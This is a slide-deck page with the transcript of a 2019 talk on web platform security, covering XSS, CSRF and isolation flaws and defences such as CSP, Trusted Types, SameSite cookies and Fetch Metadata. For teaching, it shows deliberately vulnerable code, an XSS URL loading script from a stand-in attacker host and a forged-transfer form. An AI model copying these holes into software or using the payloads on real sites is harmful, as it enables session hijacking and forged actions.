Upgrade to Pro — share decks privately, control downloads, hide ads and more …

Web Platform Security @ TechDays 2019

Mike West
PRO
June 03, 2019
Programming
1
110

Web Platform Security @ TechDays 2019

Web Platform Security.

Mike West
PRO

June 03, 2019
Tweet

More Decks by Mike West

See All by Mike West
W3C Permissions Workshop - 2022-12-05
mikewest
PRO
0
13
Isolation by Default
mikewest
PRO
0
1.3k
The Web We Can Ship
mikewest
PRO
0
260
Web Platform Security @ CMS Security Summit 2020
mikewest
PRO
0
1.8k
Cookies are bad @ HTTP Workshop 2019
mikewest
PRO
0
370
Web Platform Security @ CMS Security Summit
mikewest
PRO
0
76
Web Platform Security PhD Summit @ Google Munich
mikewest
PRO
2
680
BSides Munich
mikewest
PRO
0
260
Hardening the Web Platform - AppSec EU, 2016
mikewest
PRO
5
1.3k

Other Decks in Programming

See All in Programming
Git Rebase
bkuhlmann
10
1.2k
爆速の日経電子版開発の今
shinyaigeek
0
250
量子コンピュータ時代のプログラミングセミナー / 20221222_Amplify_seminar _route_optimization
fixstars
0
240
はてなリモートインターンシップ2022 インフラ 講義資料
hatena
4
2.1k
僕が考えた超最強のKMMアプリの作り方
spbaya0141
0
170
Jetpack Compose 完全に理解した
mkeeda
1
420
xarray-Datatree: Hierarchical Data Structures for Multi-Model Science
tomnicholas
0
200
Amazon QuickSightのアップデート -re:Invent 2022の復習&2022年ハイライト-
shogo452
0
200
Remote SSHで行うVS Codeリモートホスト開発とトラブルシューティング
smt7174
1
390
SHOWROOMの分析目的を意識した伝え方・コミュニケーション
hatapu
0
230
Makuakeの認証基盤とRe-Architectureチーム
bmf_san
0
150
ipa-medit: Memory search and patch tool for IPA without Jailbreaking/ipa-medit-bh2022-europe
tkmru
0
120

Featured

See All Featured
Fontdeck: Realign not Redesign
paulrobertlloyd
74
4.3k
What the flash - Photography Introduction
edds
64
10k
"I'm Feeling Lucky" - Building Great Search Experiences for Today's Users (#IAC19)
danielanewman
217
21k
The Art of Programming - Codeland 2020
erikaheidi
35
11k
Art, The Web, and Tiny UX
lynnandtonic
284
18k
Visualizing Your Data: Incorporating Mongo into Loggly Infrastructure
mongodb
32
6.7k
個人開発の失敗を避けるイケてる考え方 / tips for indie hackers
panda_program
29
7.7k
Git: the NoSQL Database
bkeepers
PRO
418
60k
The Web Native Designer (August 2011)
paulrobertlloyd
76
2.2k
Designing on Purpose - Digital PM Summit 2013
jponch
108
5.9k
実際に使うSQLの書き方 徹底解説 / pgcon21j-tutorial
soudai
44
14k
GitHub's CSS Performance
jonrohan
1020
430k

Transcript

  1. Web Platform Security Mike West, Google Chrome @mikewest [email protected] http://bit.ly/wps_techdays_2019

  2. None
  3. None

  4. Google Vulnerability Reward Program (VRP) payouts in 2018 XSS 35.6%

    CSRF 3.2% Clickjacking 4.2% Other web bugs 7.8% Non-web issues 49.1% Mobile app vulnerabilities Business logic (authorization) Server /network misconfigurations ...

  5. Injections <?php echo $_GET["query"] ?> foo.innerHTML = location.hash.slice(1) 1. Logged

    in user visits attacker's page 2. Attacker navigates user to a vulnerable URL 3. Script runs, attacker gets access to user's session … and many other patterns Bugs: Cross-site scripting (XSS) https://victim.example/?query=<script src="//evil/">

  6. Insufficient isolation 1. Logged in user visits attacker's page 2.

    Attacker sends cross-origin request to vulnerable URL 3. Attacker takes action on behalf of user, or infers information about the user's data in the vulnerable app. Bugs: Cross-site request forgery (CSRF), XS-leaks, timing, ... <form action="/transferMoney"> <input name="recipient" value="Lukas" /> <input name="amount" value="10" /> <form action="//victim.example/transferMoney"> <input name="recipient" value="Attacker" /> <input name="amount" value="∞" />

  7. Insufficient isolation New classes of flaws related to insufficient isolation

    on the web: - Microarchitectural issues (Spectre / Meltdown) - Advanced web APIs used by attackers - Improved exploitation techniques The number and severity of these flaws is growing.

  8. Collaborate in standards bodies

  9. https://w3c.github.io/webappsec-csp/ https://csp.withgoogle.com/

  10. https://wicg.github.io/trusted-types

  11. https://tools.ietf.org/html/draft-ietf-httpbis-rfc6265bis https://web.dev/samesite-cookies-explained/

  12. https://w3c.github.io/webappsec-fetch-metadata

  13. https://github.com/whatwg/html/issues/3740

  14. https://github.com/whatwg/fetch/issues/687

  15. https://www.arturjanc.com/cross-origin-infoleaks.pdf

  16. Thanks! Mike West, Google Chrome @mikewest [email protected] http://bit.ly/wps_techdays_2019